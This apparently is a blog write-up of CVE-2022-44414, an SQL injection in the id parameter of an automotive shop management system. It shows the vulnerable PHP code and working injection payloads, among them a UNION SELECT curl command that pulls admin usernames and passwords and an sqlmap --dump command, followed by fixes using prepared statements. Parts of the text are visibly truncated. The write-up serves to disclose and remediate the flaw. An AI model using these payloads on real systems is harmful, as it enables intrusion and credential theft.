CVE-2022-44414 - Exploiting SQL Injection in Automotive Shop Management System v1.

---

Introduction

In today’s post, we’re taking a closer look at CVE-2022-44414, which affects the Automotive Shop Management System (ASMS) v1.. This vulnerability is a classic example of SQL Injection (SQLi) found in the manage_service.php file. If you use this software, you need to pay attention—an attacker could potentially access or destroy sensitive data from your database.

Let’s break down how the vulnerability works, how you can test it, and what you should do to fix it.

What is CVE-2022-44414?

CVE-2022-44414 is a SQL Injection vulnerability discovered in the Automotive Shop Management System v1.. The flaw exists in the /asms/admin/services/manage_service.php file, specifically in the id parameter.

This issue occurs because user input (id) is passed directly to an SQL query without proper sanitization or parameterization, letting attackers run malicious SQL code.

Official References

- NVD Entry
- Exploit DB Reference

The main problem sits in this line of code (simplified)

// manage_service.php (bad code example)
$id = $_GET['id'];
$query = "SELECT * FROM services WHERE id = $id";
$result = mysqli_query($connection, $query);

Here, they take the id directly from the URL and put it into the SQL query without any filtering.

Suppose you click this link

http://example.com/asms/admin/services/manage_service.php?id=2

The application processes id=2, and it shows service number 2. But what if we tweak the URL?

http://example.com/asms/admin/services/manage_service.php?id=2%20OR%201=1

The query becomes

SELECT * FROM services WHERE id = 2 OR 1=1

Now, the condition 1=1 is always true, so the query fetches all records, potentially exposing data.

To show the impact, here is a simple example using curl

curl "http://example.com/asms/admin/services/manage_service.php?id=1%20UNION%20SELECT%201,username,password,4%20FROM%20admin_users";

Replace example.com with your target and adjust column numbers/types as needed.

UNION SELECT lets you fetch data from another table.

- Here, for example, we’re trying to display admin usernames and passwords if the table is called admin_users.

*Note: This is for educational purposes only. Do not exploit systems you do not own or have explicit permission to test.*

`

http://example.com/asms/admin/services/manage_service.php?id=1'

Automatic Testing (using sqlmap)

sqlmap -u "http://example.com/asms/admin/services/manage_service.php?id=1"; --batch --dump

sqlmap will try to detect injectable parameters and may even dump table contents (if vulnerable).

Don’t insert user input directly into queries. Instead, use parameterized queries

$id = $_GET['id'];
$stmt = $connection->prepare("SELECT * FROM services WHERE id = ?");
$stmt->bind_param("i", $id);
$stmt->execute();

Allow only numbers if an id must be numeric

$id = intval($_GET['id']);

3. Least Privilege

Don’t let your database user have more permissions than necessary. This limits the damage an attacker can do.

4. Update and Patch

Check with the project maintainers for an updated, patched version. If it’s abandoned, consider migrating to a better-maintained system.

Why This Matters

SQL Injection is one of the most dangerous web vulnerabilities. A successful attack could let hackers:

Destroy or corrupt your database.

If you’re building or running anything with PHP and MySQL, never trust user input!

Conclusion

CVE-2022-44414 is a textbook example of what happens when you skip input validation and prepared statements in your code. Automotive Shop Management System v1. users should patch their systems as soon as possible and always follow secure coding practices.

Remember:

Further Reading

- OWASP SQL Injection
- PHP: Prepared Statements

Timeline

Published on: 11/18/2022 19:15:00 UTC
Last modified on: 11/20/2022 07:57:00 UTC